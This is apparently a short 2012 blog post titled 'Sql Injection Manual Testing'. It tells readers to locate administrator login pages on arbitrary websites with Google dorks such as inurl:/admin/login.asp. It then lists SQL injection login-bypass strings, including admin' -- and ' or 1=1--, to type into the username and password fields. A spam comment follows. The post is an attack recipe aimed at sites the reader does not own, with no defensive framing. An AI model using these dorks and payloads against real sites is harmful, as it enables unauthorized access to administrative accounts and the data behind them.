Tuesday, May 29, 2012

Sql Injection Manual Testing

Search for login or Admin login Pages.

ex: google dork. Go to google Home page

in search bar type.. " inurl:/admin/login.asp" or " inurl: /adminlogin.asp" ...somewhat like that

put the sql magic qoutes in username and password fields.There are many sql quotes like :
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • ='or''=

1 comment:

  1. Very useful posting.I liked it .Take a look to my financial blog here.



    ReplyDelete